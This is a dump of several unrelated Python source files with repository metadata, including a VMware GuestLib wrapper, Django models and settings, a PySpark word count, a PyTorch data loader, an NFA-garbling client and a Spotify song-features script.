ret = vmGuestLib.VMGuestLib_GetHostMemSharedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemSwappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemUnmappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemUnmappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemUsedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemUsedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostNumCpuCores(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostNumCpuCores(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetHostProcessorSpeed(self):
'''Retrieves the speed of the ESX system's physical CPU in MHz.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostProcessorSpeed(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemActiveMB(self):
'''Retrieves the amount of memory the virtual machine is actively using its
estimated working set size.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemActiveMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemBalloonedMB(self):
'''Retrieves the amount of memory that has been reclaimed from this virtual
machine by the vSphere memory balloon driver (also referred to as the
"vmmemctl" driver).'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemBalloonMaxMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonMaxMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemBalloonTargetMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonTargetMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemLimitMB(self):
'''Retrieves the upper limit of memory that is available to the virtual
machine. For information about setting a memory limit, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemLimitMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemLLSwappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemLLSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemMappedMB(self):
'''Retrieves the amount of memory that is allocated to the virtual machine.
Memory that is ballooned, swapped, or has never been accessed is
excluded.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemMappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemOverheadMB(self):
'''Retrieves the amount of "overhead" memory associated with this virtual
machine that is currently consumed on the host system. Overhead
memory is additional memory that is reserved for data structures required
by the virtualization layer.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemOverheadMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemReservationMB(self):
'''Retrieves the minimum amount of memory that is reserved for the virtual
machine. For information about setting a memory reservation, see "Limits
and Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemReservationMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSharedMB(self):
'''Retrieves the amount of physical memory associated with this virtual
machine that is copy-on-write (COW) shared on the host.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSharedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSharedSavedMB(self):
'''Retrieves the estimated amount of physical memory on the host saved
from copy-on-write (COW) shared guest physical memory.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSharedSavedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemShares(self):
'''Retrieves the number of memory shares allocated to the virtual machine.
For information about how an ESX server uses memory shares to manage
virtual machine priority, see the vSphere Resource Management Guide.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemShares(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSwappedMB(self):
'''Retrieves the amount of memory that has been reclaimed from this virtual
machine by transparently swapping guest memory to disk.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemSwapTargetMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSwapTargetMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemTargetSizeMB(self):
'''Retrieves the size of the target memory allocation for this virtual machine.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemTargetSizeMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemUsedMB(self):
'''Retrieves the estimated amount of physical host memory currently
consumed for this virtual machine's physical memory.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemUsedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemZippedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemZippedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemZipSavedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemZipSavedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# vim:ts=4:sw=4:et
| [
"[email protected]"
]
| |
edde0aa8cdab82be21c8ef2341f0114662f4921c | 2d89afd5ca29fc2735a00b0440ea7d5408c8e398 | /Crash Course/chap07/cities.py | ca28aba1f3091b08eb1dc268634339b862f19435 | []
| no_license | TrystanDames/Python | 6b2c8721606e046d9ff0708569a97d7b78a0f88e | 68b3f5f160b46fa4e876d58808ff78ac7f2d84df | refs/heads/main | 2023-06-03T14:25:51.638345 | 2021-06-23T08:54:18 | 2021-06-23T08:54:18 | 357,112,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | prompt = "\nPlease enter the name of a city you have visited:"
prompt += "\n(Enter 'quit' when you are finished.) "
while True:
city = input(prompt)
if city == 'quit':
break
else:
print(f"I'd love to go to {city.title()}!") | [
"[email protected]"
]
| |
3523fe1ae052b3f169f7bc74db4e83be9b2377c2 | 40afc1f3790099d2d5270503d101f30c71a89f07 | /usersys/views/user.py | d4c9af3172aaa675d041cfa02bcb920867dd7649 | []
| no_license | fhydralisk/reviewing | a3d31af1e8fe8caf2e831b35816d638ac0cadcce | 7a27f278f85f9fdbcc805b0290f6bbdbb7147609 | refs/heads/master | 2020-05-14T23:27:37.229343 | 2019-05-07T12:28:21 | 2019-05-07T12:28:21 | 181,997,119 | 0 | 2 | null | 2019-05-07T07:38:14 | 2019-04-18T01:49:53 | Python | UTF-8 | Python | false | false | 431 | py | from base.views import WLAPIGenericView
from ..serializers import user as user_serializers
from ..funcs import user as user_funcs
class UserView(WLAPIGenericView):
http_method_names = ['get', 'patch', 'options']
API_SERIALIZER = {
'patch': user_serializers.UserPartialUpdateSerializer
}
RESULT_SERIALIZER = {
'get': user_serializers.UserDetailSerializer
}
FUNC_CLASS = user_funcs.UserFunc
| [
"[email protected]"
]
| |
adaa3bcc2f1130b6551be40f14ba5bf15c68f983 | 5117ae47abf2b1c72c5c808b39048ae2686be0f9 | /listings/models.py | 6b8b3acddd8045715c14f5018ba637bdbbdbed0d | []
| no_license | nayanpsharma/nayan_property_project | a7cc18bbedccf7f12b7bde16658898581ad02146 | 1ef766444696b3049f6e630e6c6a9b75d779c2b4 | refs/heads/master | 2022-12-18T21:57:47.426545 | 2020-09-18T21:16:26 | 2020-09-18T21:16:26 | 296,731,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,445 | py | from django.db import models
from datetime import datetime
from realtors.models import Realtor
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_2 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_3 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_4 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_5 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_6 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
| [
"[email protected]"
]
| |
fde0cdf4ea3b11cec022c1c518b01a1f0e60eabc | 4559036e4b91f064c85214276a526ed566107f1f | /surname_rnn/surname/containers.py | 0a8b4fc2b42148f674fa2146ee9800ea9e96f927 | [
"Apache-2.0"
]
| permissive | sudarshan85/nlpbook | f55017e5ec0d20f0bf5816438835322a8eff70e4 | 41e59d706fb31f5185a0133789639ccffbddb41f | refs/heads/master | 2020-04-28T01:49:42.739340 | 2019-05-03T16:09:08 | 2019-05-03T16:09:08 | 174,873,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,614 | py | #!/usr/bin/env python
import pandas as pd
from pathlib import Path
from torch.utils.data import DataLoader
class ModelContainer(object):
def __init__(self, model, optimizer, loss_fn, scheduler=None):
self.model = model
self.optimizer = optimizer
self.loss_fn = loss_fn
self.scheduler = scheduler
class DataContainer(object):
def __init__(self, df_with_split: pd.DataFrame, dataset_class, vectorizer_file: Path, batch_size:
int, with_test=True, is_load: bool=True) -> None:
self.train_df = df_with_split.loc[df_with_split['split'] == 'train']
self.val_df = df_with_split.loc[df_with_split['split'] == 'val']
self._bs = batch_size
self.with_test = with_test
self.is_load = is_load
self._lengths = {'train_size': len(self.train_df), 'val_size': len(self.val_df)}
self._n_batches = [self._lengths['train_size'] // self._bs, self._lengths['val_size'] //
self._bs]
if not self.is_load:
print("Creating and saving vectorizer")
train_ds = dataset_class.load_data_and_create_vectorizer(self.train_df)
train_ds.save_vectorizer(vectorizer_file)
self.train_ds = dataset_class.load_data_and_vectorizer_from_file(self.train_df, vectorizer_file)
self.vectorizer = self.train_ds.vectorizer
self.surname_vocab = self.vectorizer.surname_vocab
self.nationality_vocab = self.vectorizer.nationality_vocab
self.train_dl = DataLoader(self.train_ds, self._bs, shuffle=True, drop_last=True)
self.val_ds = dataset_class.load_data_and_vectorizer(self.val_df, self.vectorizer)
self.val_dl = DataLoader(self.val_ds, self._bs, shuffle=True, drop_last=True)
if self.with_test:
self.test_df = df_with_split.loc[df_with_split['split'] == 'test']
self._lengths['test_size'] = len(self.test_df)
self._n_batches.append(self._lengths['test_size'] // self._bs)
self.test_ds = dataset_class.load_data_and_vectorizer(self.test_df, self.vectorizer)
self.test_dl = DataLoader(self.test_ds, self._bs, shuffle=True, drop_last=True)
def get_loaders(self):
return self.train_dl, self.val_dl, self.test_dl
@property
def train_batches(self):
return self._n_batches[0]
@property
def val_batches(self):
return self._n_batches[1]
@property
def test_batches(self):
if not self.with_test:
raise NameError("No test dataset was provided")
return self._n_batches[2]
@property
def vocab_size(self):
return len(self.surname_vocab)
@property
def n_classes(self):
return len(self.nationality_vocab)
@property
def sizes(self):
return self._lengths
| [
"[email protected]"
]
| |
ae970afe343d32e40e8270515b8495c93e849c6a | bd34847cf9e0e7c57f86c709bd0ab375b3eef682 | /spark/word_count.py | 3e27f4a950058d786f358811bf6c98674d325add | []
| no_license | vshaveyko/learn_py | 68ad17c1353859d32997989ae12de6a6ccd113da | 2ceb5ed599ce59a611fb5ad366c9b45e2db29a82 | refs/heads/master | 2021-09-01T22:44:16.980240 | 2017-12-29T01:06:25 | 2017-12-29T01:06:25 | 115,279,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | '''Print the words and their frequencies in this file'''
import operator
import pyspark
def main():
'''Program entry point'''
#Intialize a spark context
with pyspark.SparkContext("local", "PySparkWordCount") as sc:
#Get a RDD containing lines from this script file
lines = sc.textFile(__file__)
#Split each line into words and assign a frequency of 1 to each word
words = lines.flatMap(lambda line: line.split(" ")).map(lambda word: (word, 1))
#count the frequency for words
counts = words.reduceByKey(operator.add)
#Sort the counts in descending order based on the word frequency
sorted_counts = counts.sortBy(lambda x: x[1], False)
#Get an iterator over the counts to print a word and its frequency
for word,count in sorted_counts.toLocalIterator():
print(u"{} --> {}".format(word, count))
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
f14053094b1246b3f7886581c70b392f158becb0 | 5b912db9e8bb7fa99d1e0932eb8a0dac7b1382f0 | /t09_get_rid_of_it/rid.py | 78d3728d97c74c9cb27f702750a297a07ef4ef65 | []
| no_license | AwesomeCrystalCat/py_s00 | 3df7b285855ea276736d0a01d98df2d8465ad707 | f4814a889b49d013b8285ab15992d0a309056ea6 | refs/heads/main | 2023-04-05T22:23:42.637972 | 2021-04-09T10:27:13 | 2021-04-09T10:27:13 | 356,228,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63 | py | my_number = 1
print(my_number)
del(my_number)
print(my_number)
| [
"[email protected]"
]
| |
9518aed6232253576108cf492c812148ebcac253 | 90c9acae92fa0ccb63f796561aef10bb9a3a31c9 | /python/analyze_db.py | 37d1f04425e0e684e1da2427fa96e25906abe190 | []
| no_license | chtlp/witness-mining | cc94f4d3249316e15eafa354ef513815fb919326 | f27455bfab2d9557494e507665418db67fe7b43f | refs/heads/master | 2021-01-19T20:27:48.079120 | 2012-08-08T09:41:54 | 2012-08-08T09:41:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,381 | py | from collections import defaultdict, OrderedDict
import csv, sqlite3, glob, sys, subprocess
from pylab import *
def analyze_columns(col_names, values):
num = len(col_names)
unique_values = [defaultdict(int) for _ in range(num)]
for row in values:
for k, c in enumerate(row):
unique_values[k][c] += 1
col_values = [None] * num
for k in range(num):
tot = sum(unique_values[k].values())
items = sorted(unique_values[k].items(), key = lambda (v, c): -c)[:10]
if sum(map(lambda (v, c): c, items)) >= 0.9 * tot:
col_values[k] = map(lambda (v, c): v, items)
return col_values
def build_count_table(col_values, col_names, values, subj):
i = col_names.index(subj)
assert col_values[i]
num = len(col_values)
count_table = [None] * num
for k in range(num):
if col_values[k]:
count_table[k] = zeros((len(col_values[k]), len(col_values[i])))
for row in values:
u = row[i]
for k, v in enumerate(row):
if col_values[k] and v in col_values[k] and u in col_values[i]:
count_table[k][ col_values[k].index(v), col_values[i].index(u) ] += 1
return count_table
def compute_entropy(count_table, col_names, subj):
ofile = open('analyze_db.log', 'w')
for k, t in enumerate(count_table):
if t is None:
continue
print 'cond_entropy( %s | %s ):\n' % (subj, col_names[k])
supp = t.sum()
ent = 0.0
m, n = t.shape
for i in range(m):
lsum = t[i,:].sum()
for j in range(n):
if t[i,j]:
ent += t[i,j] / supp * log( lsum / t[i,j] )
h_xy = 0.0
for i in range(m):
for j in range(n):
if t[i,j]:
h_xy += (t[i,j] / supp) * log(supp / t[i,j])
h_x = 0.0
for i in range(m):
s = t[i,:].sum()
if s:
h_x += (s / supp) * log(supp / s)
h_y = 0.0
for j in range(n):
s = t[:,j].sum()
if s:
h_y += (s / supp) * log(supp / s)
assert h_x <= h_xy and h_y <= h_xy,'h_x = %.3f, h_y = %.3f, h_xy = %.3f' % (h_x, h_y, h_xy)
print '\tsupport = %d, value = %.3f\n' % (supp, ent)
if not h_x:
continue
mic = (h_x + h_y - h_xy) / min(h_x, h_y)
print '\tmic = %.3f\n' % mic
ofile.write('%s\t%.3f\n' % (col_names[k], mic))
ofile.close()
def analyze_table(col_names, values, subj):
col_values = analyze_columns(col_names, values)
count_table = build_count_table(col_values, col_names, values, subj)
compute_entropy(count_table, col_names, subj)
def analyze_person_accident(conn, cur):
cur.execute("PRAGMA table_info(PERSON)")
c1 = cur.fetchall()
cur.execute("PRAGMA table_info(ACCIDENT)")
c2 = cur.fetchall()
cur.execute('select * from PERSON JOIN ACCIDENT where PERSON.CASENUM == ACCIDENT.CASENUM')
res = cur.fetchall()
cols = map(lambda t: t[1], c1) + map(lambda t: t[1], c2)
analyze_table(cols, res, 'INJ_SEV')
if __name__ == '__main__':
conn = sqlite3.connect('traffic.db')
conn.text_factory = str
cur = conn.cursor()
analyze_person_accident(conn, cur)
cur.close()
conn.close()
| [
"[email protected]"
]
| |
f8dab2f0e3f3dfa5c4a51b8eadc87e0c3034cb09 | fd3436480761c48535da13752ed7681abdbd535d | /delegate.py | 4131f9203dd01d50b2ff11f5c38eedbc49f49024 | []
| no_license | jayantjain100/nfa_computation_delegation | ea932047ec0e99ec3490e45d62e86f377596a799 | 9632d5489e6a9332474496fae4d3f82d876c1009 | refs/heads/master | 2020-07-24T09:10:49.844887 | 2019-12-02T05:18:01 | 2019-12-02T05:18:01 | 207,878,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,680 | py | from nfa import NFA
import socket
from socket_sending import receive_object
from socket_sending import send_object
import argparse
def verify_yes_ans(given_label, final_labels):
if(given_label in final_labels):
return True
else:
return False
parser = argparse.ArgumentParser(description='client that delegates NFA computation to prover and verifies')
parser.add_argument('--ip', metavar='ip', type=str, default='127.0.0.1',
help='the ip address of the server where the prover is running, default is localhost')
parser.add_argument('--port', metavar = 'port', type = int, default = 12345, help='port number of server to connect to, default is 12345 ')
args = parser.parse_args()
def delegate(nfas, input_string, indexes):
to_send = []
corresponding_final_labels = []
print('Creating garbled NFAs...')
for ind in indexes:
my_nfa = nfas[ind]
(gnfa, final_labels) = my_nfa.garble(input_string)
to_send.append(gnfa)
corresponding_final_labels.append(final_labels)
print('Sending garbled NFAs...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# port = 45000
s.connect((args.ip, args.port))
send_object(s, to_send)
print('Waiting to receive result from prover...')
received_ans = receive_object(s)
print('Received the result.!')
print()
final_ans = []
for ind in range(len(received_ans)):
ans = received_ans[ind]
if(not ans[0]): # no, but unsure
final_ans.append(False)
elif(ans[0] and verify_yes_ans(ans[1], corresponding_final_labels[ind])): # yes, confirmed
final_ans.append(True)
else: # wrong proof given by prover
final_ans.append(False)
return final_ans
| [
"[email protected]"
]
| |
df0a60238544af1eabcce7960d656b63097a4e40 | d98b0d74639be1b7fdd737b4ddb6938d74157865 | /mysite/settings.py | 7e61b134ea0d195d268887d0a08fef0772a4b465 | []
| no_license | sebastiansilbernagl/djangogirls-blog | e70d2d673be67145fc8cc12cde3d7dba5a9e5bf9 | 15df60e2af4dadf01165efe6817dea2f6a7e2c65 | refs/heads/master | 2020-05-23T10:14:35.840139 | 2017-01-30T12:52:44 | 2017-01-30T12:52:44 | 80,407,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,232 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4)r8d1vo+6v4a&940f7t53g9cozbz9)(^8cbi--m5qe5hju%2l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'sebsilbernagl.pythonanywhere.com', 'localhost',]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Johannesburg'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"[email protected]"
]
| |
1dccfb0f90cf749916c6492d1e8a811a652e9e72 | 39b916e8969712a31195586ba6666744342b0fcf | /inheritance.py | b94276e67bcb37d6bdd1c591fbef51731a5cbdf0 | []
| no_license | bhumphris/Inheritance | 165391f1e4125d63d6fd7bb7447fb3860f52020a | e61a833c9b4eb49981fa91db31b53b7f450cfc03 | refs/heads/master | 2020-06-13T15:48:09.292442 | 2016-12-02T05:27:28 | 2016-12-02T05:27:28 | 75,363,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | import officeFurniture
def main():
desk = officeFurniture.Desk("Desk", "Metal", 48, 20, 36, 2, "Left", 3, 155.50)
print("Product: " + desk.get_category())
print("Material: " + desk.get_material())
print("Length: " + str(desk.get_length()))
print("Width: " + str(desk.get_width()))
print("Height: " + str(desk.get_height()))
print("Number of Drawers: " + str(desk.get_drawers()))
print("Location of Drawers: " + desk.get_location())
print("Quantity: " + str(desk.get_quantity()))
print("Price: ${:0,.2f}\n".format(desk.get_price()))
print desk
main()
| [
"[email protected]"
]
| |
36c64c45720f28189ea436e39cd685e6744f24e4 | 7a37bd797ea067685c887328e3b447e008e8c170 | /resourceserver/resourceserver/urls.py | e551621de72683b31896faeaa5739218174e3612 | []
| no_license | Telmediq/hydrapoc | 2e73f1b82d64d9f6b0e429e124923ede080c40a7 | b22e0a22e97705ced2379e145c798ea2f66de25d | refs/heads/master | 2020-07-14T23:32:30.147831 | 2019-09-17T21:10:04 | 2019-09-17T21:10:04 | 205,427,268 | 0 | 0 | null | 2019-12-05T00:10:34 | 2019-08-30T17:23:05 | C# | UTF-8 | Python | false | false | 1,059 | py | """resourceserver URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from resourceserver import views
urlpatterns = [
path('oauth2/init', views.oauth_start, name='oauth2-init'),
path('oauth2/finish', views.oauth_finish, name='oauth2-finish'),
path('login', views.login, name='login'),
path('protected', views.protected),
path('token/<identifier>', views.view_token),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
]
| |
530cc38befdec212750b6f4b4eefc95536c4852c | 39a7bc82dc6b08dc347816859eddc1ebd590138c | /chapter02/06-bisect.insort.py | a2a6b85c83d4b643e534321cd93627e1c0eebb3c | []
| no_license | mgw2168/fluent_python | 1a21568a70708b390e169e4126eebe76a0296d29 | ab075e33290f75d690d455e42d3ff17f4d1e29ba | refs/heads/master | 2020-07-04T22:46:12.695267 | 2019-12-05T08:05:56 | 2019-12-05T08:05:56 | 202,447,177 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | import bisect
import random
SIZE = 7
random.seed(1729)
my_list = []
# insort(seq, item)将变量item插入序列seq中,并能保证seq的升序
for i in range(SIZE):
new_item = random.randrange(SIZE*2)
bisect.insort(my_list, new_item)
print('%2d ->' % new_item, my_list)
| [
"[email protected]"
]
| |
797ecbc116b4a0204337d20868dc1e94f0595a59 | d74cf31046b9cf7d6ea77ab3e9ed1f293beabeb9 | /charts_analyzer.py | b1f4b099e9a0a8ed64b168ca5700f71a0350beed | []
| no_license | sampurkiss/song_features | 789c6ad01455528af3c7c667218301ee8d1312b2 | 6ab81b4059645c143c1be478e335146283e85c73 | refs/heads/master | 2020-05-06T20:00:00.832903 | 2019-06-02T03:59:50 | 2019-06-02T03:59:50 | 180,215,794 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,847 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 3 13:05:13 2019
@author: Sam Purkiss
"""
import os
os.chdir('C:/Users/sam purkiss/Documents/Code/Music/')
import pandas as pd
import spotipy
import re
from spotipy.oauth2 import SpotifyClientCredentials
from credentials import CLIENT_ID,CLIENT_SECRET
#Need to create a credentials file with your spotify api keys
client_credentials_manager = SpotifyClientCredentials(CLIENT_ID,CLIENT_SECRET)
spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
names_giving_probs = ['21 savage & metro boomin featuring future',
'21 savage, offset metro boomin ring quavo',
'21 savage, offset metro boomin ring travis scott',
'Dont Trust Me',
'Hit It Again',
'a r rahman & the pussycat dolls featuring nicole scherzinger',
'A Change Is Gonna Come',
'\'N Sync']
def get_music_features(artist_name, song_name):
"""
Spotify API caller to pull features for individual tracks.
Paramaters:
artist_name: name of artist
song_name: song by artist of interest
Returns: Pandas dataframe with variables identified in the API documentation:
https://developer.spotify.com/documentation/web-api/reference/tracks/get-audio-features/
Usage:
client_credentials_manager = SpotifyClientCredentials(CLIENT_ID,CLIENT_SECRET)
spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
song_features = get_music_features('the cure','Friday im in love')
"""
#Use these lists to fix common problems in naming conventions
words_to_remove = ['&.+',
'featuring.+',#the .+ is a regex expression that
# will strip off words following the main word.
#Eg "Alvin And The Chipmunks Featuring Chris Classic"
#becomes just "Alvin And The Chipmunks." This is
#necessary because Spotify search often has a hard time
#finding songs with multiple featured artists.
#This may cause an issue where songs that are have versions
#with and without different artists aren't distinguished
#between
'feat..+',
'feat.+',
'with.+',
'(?<= )[\+](?= ).+',
'duet',
'(?<= )[xX](?= )',
#note that this will only strip the x away if there's
#an x with spaces on both sides
"'",
'\*',
"\(",
"\)"
]
words_to_remove_from_songs =["'",
'[a-zA-Z]+(\*)+(?P<named_group>).+(?= )',#used for capturing
#words that are censored eg N***s,
'\([a-zA-Z]+.+\)' #remove any words in brackets
]
artist = artist_name.lower()
